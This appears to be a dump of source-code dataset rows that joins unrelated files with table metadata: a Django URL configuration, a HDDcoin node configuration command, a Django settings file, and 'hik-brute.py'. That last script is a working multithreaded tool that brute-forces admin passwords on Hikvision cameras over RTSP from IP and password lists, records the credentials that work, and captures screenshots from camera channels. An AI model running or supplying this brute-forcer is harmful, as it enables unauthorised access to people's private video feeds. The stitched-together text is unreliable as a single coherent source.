url(r'^customizations/(?P<pk>[0-9]+)/$', QModelCustomizationDetail.as_view(), name="customization-detail"),
url(r'^customizations/cache/$', get_cached_customizations, name="customization-cache"),
# getting realization info...
url(r'^realizations/$', QModelRealizationList.as_view(), name="realization-list"),
url(r'^realizations/(?P<pk>[0-9]+)/$', QModelRealizationDetail.as_view(), name="realization-detail"),
url(r'^realizations/cache/$', get_cached_realizations, name="realization-cache"),
)
if settings.DEBUG:
# only expose pre-defined api urls in debug mode...
api_urls += patterns('', url(r'^$', api_root))
# automatically add support for different serialization formats (JSON is default)...
api_urls = format_suffix_patterns(api_urls)
services_urls = patterns('',
# testing (obviously)...
url(r'^test/$', q_services_test),
# getting pending messages...
url(r'^messages/$', get_django_messages),
# routing http calls through a proxy...
url(r'^proxy/$', q_proxy, name="proxy"),
# logging data from the client...
url(r'^log/$', q_log, name="log"),
# the WORLD-FAMOUS load-on-demand paradigm...
url(r'^load_section/(?P<section_type>[^/]+)/$', q_load_section, name="load_section"),
# joining a project...
url(r'^(?P<project_name>[^/]+)/project_join_request/$', q_project_join_request, name="project_join_request"),
# managing a project...
url(r'^(?P<project_name>[^/]+)/project_add_member/$', q_project_add_member, name="project_add_member"),
# deleting a customization...
url(r'^customization_delete/$', q_customization_delete, name="customization_delete"),
# adding a relationship...
url(r'^realization_add_relationship_value/$', q_realization_add_relationship_value, name="realization_add_relationsip_value"),
# removing a relationship...
url(r'^realization_remove_relationship_value/$', q_realization_remove_relationship_value, name="realization_remove_relationsip_value"),
# publishing a realization...
url(r'^realization_publish/$', q_realization_publish, name="realization_publish"),
)
urlpatterns = patterns('',
# RESTful API...
url(r'^api/', include(api_urls)),
# webservices (AJAX POST only) outside of RESTful API...
url(r'^services/', include(services_urls)),
# testing (obviously)...
url(r'^test/$', q_test, name="test"),
# help...
url(r'^help/$', RedirectView.as_view(url=settings.Q_HELP_URL, permanent=True), name="help"),
# customizations...
url(r'^(?P<project_name>[^/]+)/customize/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_customize_new, name="customize_new"),
url(r'^(?P<project_name>[^/]+)/customize/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<customization_name>[^/]+)/$', q_customize_existing, name="customize_existing"),
# realizations...
url(r'^(?P<project_name>[^/]+)/edit/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_edit_new, name="edit_new"),
url(r'^(?P<project_name>[^/]+)/edit/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<realization_pk>[^/]+)/$', q_edit_existing, name="edit_existing"),
url(r'^(?P<project_name>[^/]+)/view/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_view_new, name="view_new"),
url(r'^(?P<project_name>[^/]+)/view/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<realization_pk>[^/]+)/$', q_view_existing, name="view_existing"),
url(r'^(?P<project_name>[^/]+)/get/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_get_existing, name="get_existing"),
# publications (ATOM feed)...
url(r'^feed/$', QFeed(), name="feed"),
url(r'^feed/(?P<project_name>[^/]+)/$', QFeed(), name="feed_project"),
url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/$', QFeed(), name="feed_project_ontology"),
url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', QFeed(), name="feed_project_ontology_proxy"),
url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<publication_name>[^/]+)/$', q_publication, name="publication_latest"),
url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<publication_name>[^/]+)/(?P<publication_version>[^/]+)/$', q_publication, name="publication_version"),
# projects...
url(r'^(?P<project_name>[^/]+)/$', q_project, name="project"),
url(r'^(?P<project_name>[^/]+)/customize/$', q_project_customize, name="project_customize"),
url(r'^(?P<project_name>[^/]+)/manage/$', q_project_manage, name="project_manage"),
# index...
url(r'^$', 'questionnaire.views.q_index', name="index"),
)
| 46.941606 | 195 | 0.664438 | , q_publication
api_urls = patterns('',
url(r'^projects_test/(?P<pk>[0-9]+)/$', QProjectTestDetail.as_view(), name="project-test-detail"),
url(r'^customizations_lite/$', QCustomizationLiteList.as_view(), name="customization_lite-list"),
url(r'^realizations_lite/$', QRealizationLiteList.as_view(), name="realization_lite-list"),
url(r'^projects_lite/$', QProjectLiteList.as_view(), name="project_lite-list"),
url(r'^projects_lite/(?P<pk>[0-9]+)/$', QProjectLiteDetail.as_view(), name="project_lite-detail"),
url(r'^projects/$', QProjectList.as_view(), name="project-list"),
url(r'^projects/(?P<pk>[0-9]+)/$', QProjectDetail.as_view(), name="project-detail"),
url(r'^ontologies/$', QOntologyList.as_view(), name="ontology-list"),
url(r'^customizations/$', QModelCustomizationList.as_view(), name="customization-list"),
url(r'^customizations/(?P<pk>[0-9]+)/$', QModelCustomizationDetail.as_view(), name="customization-detail"),
url(r'^customizations/cache/$', get_cached_customizations, name="customization-cache"),
url(r'^realizations/$', QModelRealizationList.as_view(), name="realization-list"),
url(r'^realizations/(?P<pk>[0-9]+)/$', QModelRealizationDetail.as_view(), name="realization-detail"),
url(r'^realizations/cache/$', get_cached_realizations, name="realization-cache"),
)
if settings.DEBUG:
api_urls += patterns('', url(r'^$', api_root))
api_urls = format_suffix_patterns(api_urls)
services_urls = patterns('',
url(r'^test/$', q_services_test),
url(r'^messages/$', get_django_messages),
url(r'^proxy/$', q_proxy, name="proxy"),
url(r'^log/$', q_log, name="log"),
url(r'^load_section/(?P<section_type>[^/]+)/$', q_load_section, name="load_section"),
url(r'^(?P<project_name>[^/]+)/project_join_request/$', q_project_join_request, name="project_join_request"),
url(r'^(?P<project_name>[^/]+)/project_add_member/$', q_project_add_member, name="project_add_member"),
url(r'^customization_delete/$', q_customization_delete, name="customization_delete"),
url(r'^realization_add_relationship_value/$', q_realization_add_relationship_value, name="realization_add_relationsip_value"),
url(r'^realization_remove_relationship_value/$', q_realization_remove_relationship_value, name="realization_remove_relationsip_value"),
url(r'^realization_publish/$', q_realization_publish, name="realization_publish"),
)
urlpatterns = patterns('',
url(r'^api/', include(api_urls)),
url(r'^services/', include(services_urls)),
url(r'^test/$', q_test, name="test"),
url(r'^help/$', RedirectView.as_view(url=settings.Q_HELP_URL, permanent=True), name="help"),
url(r'^(?P<project_name>[^/]+)/customize/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_customize_new, name="customize_new"),
url(r'^(?P<project_name>[^/]+)/customize/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<customization_name>[^/]+)/$', q_customize_existing, name="customize_existing"),
url(r'^(?P<project_name>[^/]+)/edit/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_edit_new, name="edit_new"),
url(r'^(?P<project_name>[^/]+)/edit/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<realization_pk>[^/]+)/$', q_edit_existing, name="edit_existing"),
url(r'^(?P<project_name>[^/]+)/view/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_view_new, name="view_new"),
url(r'^(?P<project_name>[^/]+)/view/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<realization_pk>[^/]+)/$', q_view_existing, name="view_existing"),
url(r'^(?P<project_name>[^/]+)/get/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_get_existing, name="get_existing"),
url(r'^feed/$', QFeed(), name="feed"),
url(r'^feed/(?P<project_name>[^/]+)/$', QFeed(), name="feed_project"),
url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/$', QFeed(), name="feed_project_ontology"),
url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', QFeed(), name="feed_project_ontology_proxy"),
url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<publication_name>[^/]+)/$', q_publication, name="publication_latest"),
url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<publication_name>[^/]+)/(?P<publication_version>[^/]+)/$', q_publication, name="publication_version"),
url(r'^(?P<project_name>[^/]+)/$', q_project, name="project"),
url(r'^(?P<project_name>[^/]+)/customize/$', q_project_customize, name="project_customize"),
url(r'^(?P<project_name>[^/]+)/manage/$', q_project_manage, name="project_manage"),
url(r'^$', 'questionnaire.views.q_index', name="index"),
)
| true | true |
7900f26237b09df2759789b602213197fc0dc727 | 2,228 | py | Python | hik-brute.py | haka110/Cam-Brute | a5e9114caab9e6a0a031e07d7b26604bebd86151 | [
"MIT"
] | 2 | 2022-02-11T08:41:38.000Z | 2022-03-12T14:39:59.000Z | hik-brute.py | haka110/Cam-Brute | a5e9114caab9e6a0a031e07d7b26604bebd86151 | [
"MIT"
] | 1 | 2021-11-17T13:44:22.000Z | 2021-11-17T13:44:22.000Z | hik-brute.py | haka110/Cam-Brute | a5e9114caab9e6a0a031e07d7b26604bebd86151 | [
"MIT"
] | 1 | 2022-03-12T18:18:38.000Z | 2022-03-12T18:18:38.000Z | import os
import time
import datetime
import socket
import platform
import sys
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore, Back, Style
def rtspbrute(ip1):
log=open("logs",'r')
if ip1 not in log:
flag=0
ip1 = ip1[:-1]
os.system("mkdir -p Hikvision/%s 2> /dev/null"%(str(ip1).strip()))
dat=datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
os.system("mkdir Hikvision/%s/%s 2>/dev/null" %(ip1.strip(),dat.strip()))
for passw in passread:
chann=1
passw = passw[:-1]
print Fore.YELLOW+"\nRunning '%s' with password '%s'\n" %(str(ip1).strip(), str(passw))
os.system("ffmpeg -v quiet -stimeout 7000000 -rtsp_transport tcp -y -i rtsp://admin:%s@%s:554/Streaming/Channels/101/ -ss 00:00:01.50 -vframes 1 Hikvision/%s/%s_temp.jpg " %(str(passw).strip(),str(ip1).strip(),str(ip1).strip(),ip1.strip()))
if os.path.exists("Hikvision/%s/%s_temp.jpg" %(str(ip1).strip(),str(ip1).strip())):
print Fore.GREEN + "Found Access of %s with password %s" %(str(ip1).strip(), str(passw))
print(Style.RESET_ALL)
access = open("hik-access-list","a")
print >> access, ("rtsp://admin:%s@%s:554/Streaming/Channels/101/" %(str(passw),str(ip1).strip()))
access.close()
log = open("logs","a")
print >> log, (str(ip1))
flag=1
while chann<=3:
print "Trying to take screenshot of Channel No. "+str(chann)
os.system("ffmpeg -v quiet -stimeout 7000000 -rtsp_transport tcp -y -i rtsp://admin:%s@%s:554/Streaming/Channels/%s01/ -ss 00:00:01.50 -vframes 1 Hikvision/%s/%s/%s_%s.jpg " %(str(passw).strip(),str(ip1).strip(),str(chann),str(ip1).strip(),str(dat).strip(),ip1.strip(),str(chann)) )
chann=chann+1
if flag == 1:
break
return 1
if __name__ == "__main__":
iplist = sys.argv[1]
f = open(iplist,"r")
ip = f.readlines()
passlist = sys.argv[2]
password = open(passlist,"r")
passread = password.readlines()
access = open("hik-access-list","w")
access.close()
pool = ThreadPool(100)
results = pool.map(rtspbrute, ip)
pool.close()
pool.join()
os.system("find Hikvision/ -type d -empty -delete")
os.system("python pics-viewer.py Hikvision")
os.system("mv index.html Hikvision.html")
print Fore.CYAN+"\n\nFINISHED\n"
| 38.413793 | 287 | 0.658887 | import os
import time
import datetime
import socket
import platform
import sys
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore, Back, Style
def rtspbrute(ip1):
log=open("logs",'r')
if ip1 not in log:
flag=0
ip1 = ip1[:-1]
os.system("mkdir -p Hikvision/%s 2> /dev/null"%(str(ip1).strip()))
dat=datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
os.system("mkdir Hikvision/%s/%s 2>/dev/null" %(ip1.strip(),dat.strip()))
for passw in passread:
chann=1
passw = passw[:-1]
print Fore.YELLOW+"\nRunning '%s' with password '%s'\n" %(str(ip1).strip(), str(passw))
os.system("ffmpeg -v quiet -stimeout 7000000 -rtsp_transport tcp -y -i rtsp://admin:%s@%s:554/Streaming/Channels/101/ -ss 00:00:01.50 -vframes 1 Hikvision/%s/%s_temp.jpg " %(str(passw).strip(),str(ip1).strip(),str(ip1).strip(),ip1.strip()))
if os.path.exists("Hikvision/%s/%s_temp.jpg" %(str(ip1).strip(),str(ip1).strip())):
print Fore.GREEN + "Found Access of %s with password %s" %(str(ip1).strip(), str(passw))
print(Style.RESET_ALL)
access = open("hik-access-list","a")
print >> access, ("rtsp://admin:%s@%s:554/Streaming/Channels/101/" %(str(passw),str(ip1).strip()))
access.close()
log = open("logs","a")
print >> log, (str(ip1))
flag=1
while chann<=3:
print "Trying to take screenshot of Channel No. "+str(chann)
os.system("ffmpeg -v quiet -stimeout 7000000 -rtsp_transport tcp -y -i rtsp://admin:%s@%s:554/Streaming/Channels/%s01/ -ss 00:00:01.50 -vframes 1 Hikvision/%s/%s/%s_%s.jpg " %(str(passw).strip(),str(ip1).strip(),str(chann),str(ip1).strip(),str(dat).strip(),ip1.strip(),str(chann)) )
chann=chann+1
if flag == 1:
break
return 1
if __name__ == "__main__":
iplist = sys.argv[1]
f = open(iplist,"r")
ip = f.readlines()
passlist = sys.argv[2]
password = open(passlist,"r")
passread = password.readlines()
access = open("hik-access-list","w")
access.close()
pool = ThreadPool(100)
results = pool.map(rtspbrute, ip)
pool.close()
pool.join()
os.system("find Hikvision/ -type d -empty -delete")
os.system("python pics-viewer.py Hikvision")
os.system("mv index.html Hikvision.html")
print Fore.CYAN+"\n\nFINISHED\n"
| false | true |
7900f28d74575776b4d682f465ff816cbf5b004b | 8,220 | py | Python | hddcoin/cmds/configure.py | grayfallstown/hddcoin-blockchain | 39164acef655b51b83f40ff808df72fbaab9c0df | [
"Apache-2.0"
] | null | null | null | hddcoin/cmds/configure.py | grayfallstown/hddcoin-blockchain | 39164acef655b51b83f40ff808df72fbaab9c0df | [
"Apache-2.0"
] | null | null | null | hddcoin/cmds/configure.py | grayfallstown/hddcoin-blockchain | 39164acef655b51b83f40ff808df72fbaab9c0df | [
"Apache-2.0"
] | null | null | null | from pathlib import Path
from typing import Dict
import click
from hddcoin.util.config import load_config, save_config, str2bool
from hddcoin.util.default_root import DEFAULT_ROOT_PATH
def configure(
root_path: Path,
set_farmer_peer: str,
set_node_introducer: str,
set_fullnode_port: str,
set_log_level: str,
enable_upnp: str,
set_outbound_peer_count: str,
set_peer_count: str,
testnet: str,
):
config: Dict = load_config(DEFAULT_ROOT_PATH, "config.yaml")
change_made = False
if set_node_introducer:
try:
if set_node_introducer.index(":"):
host, port = (
":".join(set_node_introducer.split(":")[:-1]),
set_node_introducer.split(":")[-1],
)
config["full_node"]["introducer_peer"]["host"] = host
config["full_node"]["introducer_peer"]["port"] = int(port)
config["introducer"]["port"] = int(port)
print("Node introducer updated")
change_made = True
except ValueError:
print("Node introducer address must be in format [IP:Port]")
if set_farmer_peer:
try:
if set_farmer_peer.index(":"):
host, port = (
":".join(set_farmer_peer.split(":")[:-1]),
set_farmer_peer.split(":")[-1],
)
config["full_node"]["farmer_peer"]["host"] = host
config["full_node"]["farmer_peer"]["port"] = int(port)
config["harvester"]["farmer_peer"]["host"] = host
config["harvester"]["farmer_peer"]["port"] = int(port)
print("Farmer peer updated, make sure your harvester has the proper cert installed")
change_made = True
except ValueError:
print("Farmer address must be in format [IP:Port]")
if set_fullnode_port:
config["full_node"]["port"] = int(set_fullnode_port)
config["full_node"]["introducer_peer"]["port"] = int(set_fullnode_port)
config["farmer"]["full_node_peer"]["port"] = int(set_fullnode_port)
config["timelord"]["full_node_peer"]["port"] = int(set_fullnode_port)
config["wallet"]["full_node_peer"]["port"] = int(set_fullnode_port)
config["wallet"]["introducer_peer"]["port"] = int(set_fullnode_port)
config["introducer"]["port"] = int(set_fullnode_port)
print("Default full node port updated")
change_made = True
if set_log_level:
levels = ["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"]
if set_log_level in levels:
config["logging"]["log_level"] = set_log_level
print(f"Logging level updated. Check {DEFAULT_ROOT_PATH}/log/debug.log")
change_made = True
else:
print(f"Logging level not updated. Use one of: {levels}")
if enable_upnp is not None:
config["full_node"]["enable_upnp"] = str2bool(enable_upnp)
if str2bool(enable_upnp):
print("uPnP enabled")
else:
print("uPnP disabled")
change_made = True
if set_outbound_peer_count is not None:
config["full_node"]["target_outbound_peer_count"] = int(set_outbound_peer_count)
print("Target outbound peer count updated")
change_made = True
if set_peer_count is not None:
config["full_node"]["target_peer_count"] = int(set_peer_count)
print("Target peer count updated")
change_made = True
if testnet is not None:
if testnet == "true" or testnet == "t":
print("Setting Testnet")
testnet_port = "58444"
testnet_introducer = "beta1_introducer.hddcoin.org"
testnet = "testnet7"
config["full_node"]["port"] = int(testnet_port)
config["full_node"]["introducer_peer"]["port"] = int(testnet_port)
config["farmer"]["full_node_peer"]["port"] = int(testnet_port)
config["timelord"]["full_node_peer"]["port"] = int(testnet_port)
config["wallet"]["full_node_peer"]["port"] = int(testnet_port)
config["wallet"]["introducer_peer"]["port"] = int(testnet_port)
config["introducer"]["port"] = int(testnet_port)
config["full_node"]["introducer_peer"]["host"] = testnet_introducer
config["selected_network"] = testnet
config["harvester"]["selected_network"] = testnet
config["pool"]["selected_network"] = testnet
config["farmer"]["selected_network"] = testnet
config["timelord"]["selected_network"] = testnet
config["full_node"]["selected_network"] = testnet
config["ui"]["selected_network"] = testnet
config["introducer"]["selected_network"] = testnet
config["wallet"]["selected_network"] = testnet
print("Default full node port, introducer and network setting updated")
change_made = True
elif testnet == "false" or testnet == "f":
print("Setting Mainnet")
mainnet_port = "8444"
mainnet_introducer = "introducer.hddcoin.org"
net = "mainnet"
config["full_node"]["port"] = int(mainnet_port)
config["full_node"]["introducer_peer"]["port"] = int(mainnet_port)
config["farmer"]["full_node_peer"]["port"] = int(mainnet_port)
config["timelord"]["full_node_peer"]["port"] = int(mainnet_port)
config["wallet"]["full_node_peer"]["port"] = int(mainnet_port)
config["wallet"]["introducer_peer"]["port"] = int(mainnet_port)
config["introducer"]["port"] = int(mainnet_port)
config["full_node"]["introducer_peer"]["host"] = mainnet_introducer
config["selected_network"] = net
config["harvester"]["selected_network"] = net
config["pool"]["selected_network"] = net
config["farmer"]["selected_network"] = net
config["timelord"]["selected_network"] = net
config["full_node"]["selected_network"] = net
config["ui"]["selected_network"] = net
config["introducer"]["selected_network"] = net
config["wallet"]["selected_network"] = net
print("Default full node port, introducer and network setting updated")
change_made = True
else:
print("Please choose True or False")
if change_made:
print("Restart any running hddcoin services for changes to take effect")
save_config(root_path, "config.yaml", config)
return 0
@click.command("configure", short_help="Modify configuration")
@click.option(
"--testnet",
"-t",
help="configures for connection to testnet",
type=click.Choice(["true", "t", "false", "f"]),
)
@click.option("--set-node-introducer", help="Set the introducer for node - IP:Port", type=str)
@click.option("--set-farmer-peer", help="Set the farmer peer for harvester - IP:Port", type=str)
@click.option(
"--set-fullnode-port",
help="Set the port to use for the fullnode, useful for testing",
type=str,
)
@click.option(
"--set-log-level",
"--log-level",
"-log-level",
help="Set the instance log level",
type=click.Choice(["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"]),
)
@click.option(
"--enable-upnp",
"--upnp",
"-upnp",
help="Enable or disable uPnP",
type=click.Choice(["true", "t", "false", "f"]),
)
@click.option(
"--set_outbound-peer-count",
help="Update the target outbound peer count (default 8)",
type=str,
)
@click.option("--set-peer-count", help="Update the target peer count (default 80)", type=str)
@click.pass_context
def configure_cmd(
ctx,
set_farmer_peer,
set_node_introducer,
set_fullnode_port,
set_log_level,
enable_upnp,
set_outbound_peer_count,
set_peer_count,
testnet,
):
configure(
ctx.obj["root_path"],
set_farmer_peer,
set_node_introducer,
set_fullnode_port,
set_log_level,
enable_upnp,
set_outbound_peer_count,
set_peer_count,
testnet,
)
| 40.895522 | 100 | 0.60292 | from pathlib import Path
from typing import Dict
import click
from hddcoin.util.config import load_config, save_config, str2bool
from hddcoin.util.default_root import DEFAULT_ROOT_PATH
def configure(
root_path: Path,
set_farmer_peer: str,
set_node_introducer: str,
set_fullnode_port: str,
set_log_level: str,
enable_upnp: str,
set_outbound_peer_count: str,
set_peer_count: str,
testnet: str,
):
config: Dict = load_config(DEFAULT_ROOT_PATH, "config.yaml")
change_made = False
if set_node_introducer:
try:
if set_node_introducer.index(":"):
host, port = (
":".join(set_node_introducer.split(":")[:-1]),
set_node_introducer.split(":")[-1],
)
config["full_node"]["introducer_peer"]["host"] = host
config["full_node"]["introducer_peer"]["port"] = int(port)
config["introducer"]["port"] = int(port)
print("Node introducer updated")
change_made = True
except ValueError:
print("Node introducer address must be in format [IP:Port]")
if set_farmer_peer:
try:
if set_farmer_peer.index(":"):
host, port = (
":".join(set_farmer_peer.split(":")[:-1]),
set_farmer_peer.split(":")[-1],
)
config["full_node"]["farmer_peer"]["host"] = host
config["full_node"]["farmer_peer"]["port"] = int(port)
config["harvester"]["farmer_peer"]["host"] = host
config["harvester"]["farmer_peer"]["port"] = int(port)
print("Farmer peer updated, make sure your harvester has the proper cert installed")
change_made = True
except ValueError:
print("Farmer address must be in format [IP:Port]")
if set_fullnode_port:
config["full_node"]["port"] = int(set_fullnode_port)
config["full_node"]["introducer_peer"]["port"] = int(set_fullnode_port)
config["farmer"]["full_node_peer"]["port"] = int(set_fullnode_port)
config["timelord"]["full_node_peer"]["port"] = int(set_fullnode_port)
config["wallet"]["full_node_peer"]["port"] = int(set_fullnode_port)
config["wallet"]["introducer_peer"]["port"] = int(set_fullnode_port)
config["introducer"]["port"] = int(set_fullnode_port)
print("Default full node port updated")
change_made = True
if set_log_level:
levels = ["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"]
if set_log_level in levels:
config["logging"]["log_level"] = set_log_level
print(f"Logging level updated. Check {DEFAULT_ROOT_PATH}/log/debug.log")
change_made = True
else:
print(f"Logging level not updated. Use one of: {levels}")
if enable_upnp is not None:
config["full_node"]["enable_upnp"] = str2bool(enable_upnp)
if str2bool(enable_upnp):
print("uPnP enabled")
else:
print("uPnP disabled")
change_made = True
if set_outbound_peer_count is not None:
config["full_node"]["target_outbound_peer_count"] = int(set_outbound_peer_count)
print("Target outbound peer count updated")
change_made = True
if set_peer_count is not None:
config["full_node"]["target_peer_count"] = int(set_peer_count)
print("Target peer count updated")
change_made = True
if testnet is not None:
if testnet == "true" or testnet == "t":
print("Setting Testnet")
testnet_port = "58444"
testnet_introducer = "beta1_introducer.hddcoin.org"
testnet = "testnet7"
config["full_node"]["port"] = int(testnet_port)
config["full_node"]["introducer_peer"]["port"] = int(testnet_port)
config["farmer"]["full_node_peer"]["port"] = int(testnet_port)
config["timelord"]["full_node_peer"]["port"] = int(testnet_port)
config["wallet"]["full_node_peer"]["port"] = int(testnet_port)
config["wallet"]["introducer_peer"]["port"] = int(testnet_port)
config["introducer"]["port"] = int(testnet_port)
config["full_node"]["introducer_peer"]["host"] = testnet_introducer
config["selected_network"] = testnet
config["harvester"]["selected_network"] = testnet
config["pool"]["selected_network"] = testnet
config["farmer"]["selected_network"] = testnet
config["timelord"]["selected_network"] = testnet
config["full_node"]["selected_network"] = testnet
config["ui"]["selected_network"] = testnet
config["introducer"]["selected_network"] = testnet
config["wallet"]["selected_network"] = testnet
print("Default full node port, introducer and network setting updated")
change_made = True
elif testnet == "false" or testnet == "f":
print("Setting Mainnet")
mainnet_port = "8444"
mainnet_introducer = "introducer.hddcoin.org"
net = "mainnet"
config["full_node"]["port"] = int(mainnet_port)
config["full_node"]["introducer_peer"]["port"] = int(mainnet_port)
config["farmer"]["full_node_peer"]["port"] = int(mainnet_port)
config["timelord"]["full_node_peer"]["port"] = int(mainnet_port)
config["wallet"]["full_node_peer"]["port"] = int(mainnet_port)
config["wallet"]["introducer_peer"]["port"] = int(mainnet_port)
config["introducer"]["port"] = int(mainnet_port)
config["full_node"]["introducer_peer"]["host"] = mainnet_introducer
config["selected_network"] = net
config["harvester"]["selected_network"] = net
config["pool"]["selected_network"] = net
config["farmer"]["selected_network"] = net
config["timelord"]["selected_network"] = net
config["full_node"]["selected_network"] = net
config["ui"]["selected_network"] = net
config["introducer"]["selected_network"] = net
config["wallet"]["selected_network"] = net
print("Default full node port, introducer and network setting updated")
change_made = True
else:
print("Please choose True or False")
if change_made:
print("Restart any running hddcoin services for changes to take effect")
save_config(root_path, "config.yaml", config)
return 0
@click.command("configure", short_help="Modify configuration")
@click.option(
"--testnet",
"-t",
help="configures for connection to testnet",
type=click.Choice(["true", "t", "false", "f"]),
)
@click.option("--set-node-introducer", help="Set the introducer for node - IP:Port", type=str)
@click.option("--set-farmer-peer", help="Set the farmer peer for harvester - IP:Port", type=str)
@click.option(
"--set-fullnode-port",
help="Set the port to use for the fullnode, useful for testing",
type=str,
)
@click.option(
"--set-log-level",
"--log-level",
"-log-level",
help="Set the instance log level",
type=click.Choice(["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"]),
)
@click.option(
"--enable-upnp",
"--upnp",
"-upnp",
help="Enable or disable uPnP",
type=click.Choice(["true", "t", "false", "f"]),
)
@click.option(
"--set_outbound-peer-count",
help="Update the target outbound peer count (default 8)",
type=str,
)
@click.option("--set-peer-count", help="Update the target peer count (default 80)", type=str)
@click.pass_context
def configure_cmd(
ctx,
set_farmer_peer,
set_node_introducer,
set_fullnode_port,
set_log_level,
enable_upnp,
set_outbound_peer_count,
set_peer_count,
testnet,
):
configure(
ctx.obj["root_path"],
set_farmer_peer,
set_node_introducer,
set_fullnode_port,
set_log_level,
enable_upnp,
set_outbound_peer_count,
set_peer_count,
testnet,
)
| true | true |
7900f2f79f90808944e1a49645ea3d9271b5adc9 | 4,055 | py | Python | hiren/settings.py | pyprism/Hiren-Git-Commit-Reminder | 253ba078f63cc9bf3f39a5b735a783c4846b5ba7 | [
"MIT"
] | null | null | null | hiren/settings.py | pyprism/Hiren-Git-Commit-Reminder | 253ba078f63cc9bf3f39a5b735a783c4846b5ba7 | [
"MIT"
] | null | null | null | hiren/settings.py | pyprism/Hiren-Git-Commit-Reminder | 253ba078f63cc9bf3f39a5b735a783c4846b5ba7 | [
"MIT"
] | null | null | null | """
Django settings for hiren project.
Generated by 'django-admin startproject' using Django 1.8.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import json
from celery.schedules import crontab
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# load json file baby :D
try:
with open('config.json') as f:
JSON_DATA = json.load(f)
except FileNotFoundError:
with open('config.sample.json') as f:
JSON_DATA = json.load(f)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('SECRET_KEY', JSON_DATA['secret_key'])
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = os.environ.get('DEBUG', False)
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'debug_toolbar',
'github'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'hiren.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hiren.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
if 'TRAVIS' in os.environ:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'travisci',
'USER': 'postgres',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '',
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'hiren_github_management',
'USER': 'hiren',
'PASSWORD': 'hiren',
'HOST': 'localhost',
'PORT': '',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Dhaka'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder"
)
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
)
LOGIN_URL = '/'
# CELERY STUFF
BROKER_URL = 'redis://localhost:6379'
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
